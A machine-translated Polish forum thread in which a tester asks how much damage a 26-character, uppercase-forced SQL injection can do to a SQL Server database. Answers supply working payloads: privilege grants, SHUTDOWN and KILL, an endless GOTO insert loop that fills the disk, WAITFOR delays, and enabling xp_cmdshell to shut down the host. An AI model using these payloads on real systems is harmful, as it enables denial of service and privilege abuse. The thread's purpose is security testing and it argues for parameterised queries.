Wstrzyknięcie SQL Server - ile szkód w 26 znakach?

Testuję odporność na ataki z zastrzyków na bazę danych SQL Server.

Wszystkie nazwy tabel w bazie danych są pisane małymi literami, a w sortowaniu rozróżniana jest wielkość liter , Latin1_General_CS_AS .

Ciąg, który mogę wysłać, jest wymuszony dużymi literami i może mieć maksymalnie 26 znaków. Nie mogę więc wysłać tabeli DROP, ponieważ nazwa tabeli byłaby zapisana wielkimi literami, a zatem instrukcja nie powiodła się z powodu sortowania.

Więc - jakie maksymalne obrażenia mógłbym zadać 26 postaciom?

EDYTOWAĆ

Wiem wszystko o sparametryzowanych zapytaniach i tak dalej - wyobraźmy sobie, że osoba, która opracowała interfejs, który buduje zapytanie do wysłania, nie użyła parametrów w tym przypadku.

Nie próbuję też robić nic złego, jest to system zbudowany przez kogoś innego w tej samej organizacji.

Łatwy:

GRANT EXECUTE TO LowlyDBA

A może tak właśnie będzie

grant execute to lowlydba 

Wybierz różne warianty tego.

Najprawdopodobniej możesz być w stanie przetestować to teraz na obecnym systemie, ale dowolna liczba drobnych zmian w bazie danych w czasie może unieważnić twoje testowanie. Ciąg znaków może się zmienić, ktoś może utworzyć procedurę składowaną małymi literami, która ma destrukcyjny potencjał - cokolwiek. Nigdy nie możesz powiedzieć ze 100% pewnością, że nie ma niszczycielskiego ataku 26 postaci, który ktoś mógłby wykonać.

Sugeruję, abyś znalazł sposób, aby programiści postępowali zgodnie z podstawowymi najlepszymi w branży najlepszymi praktykami bezpieczeństwa, choćby dla własnego dobra, ponieważ ktoś, kogo, jak sądzę, jest przynajmniej częściowo odpowiedzialny za naruszenia bezpieczeństwa.

Edytować:

A jeśli chodzi o złośliwość / zabawę, możesz spróbować włączyć każdą flagę śledzenia. To byłoby interesujące do zaobserwowania. Wygląda na to, że post na blogu Brent Ozar zrobiłby ...

DBCC TRACEON(xxxx, -1)

SHUTDOWNPolecenie lub KILLCommand (wybrać losową liczbę ponad 50) zarówno przyjąć znacznie mniej niż 26 znaków, choć rachunek wykonywania zapytań aplikacji oby nie ma wystarczających uprawnień do uruchamiania tych.

Możesz utworzyć tabelę, którą wypełniasz do końca czasu lub miejsca na dysku zabraknie tego, co nastąpi wcześniej.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

W zależności od definicji szkody możesz uruchomić to: WAITFOR DELAY '23: 59 'Aby być naprawdę złym, możesz użyć narzędzia do testowania obciążenia, aby uruchomić to z 32 768 klientów.

Wariacja oparta na odpowiedzi @ MikaelEriksson i odpowiedzi @ MartinSmith na mój pierwszy komentarz:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Początkowo próbowałem wykonać oświadczenie WHILE, ale najlepsze, co mogłem zrobić, to 27 znaków:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

Ale Martin zwrócił uwagę na GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO ... źródło wszelkiego zła i twórca instrukcji wstawiania w nieskończonej pętli w 26 znakach.

Mając to na uwadze ... może być korzystne trzymanie się CHAR (99) zamiast int, ponieważ to zajmowałoby więcej miejsca. Inne opcje albo używają dłuższych nazw i zmniejszają limit 26 znaków ... lub zużywają mniej miejsca na wiersz.

Pełny kod testowy:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

W zależności od tego, jak szkodliwe uważasz za wyłączenie. :-)

Wymaga to włączenia xp_cmdshell na serwerze, czego nie ma w przypadku kilku ostatnich wersji SQL Server. Wymaga również, aby konto usługi miało prawo do zamknięcia, które może mieć lub nie.

Włączenie xp_cmdshell prawdopodobnie przekracza limit 26 znaków. Czy pozwoliłbyś na wielokrotne zastrzyki?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE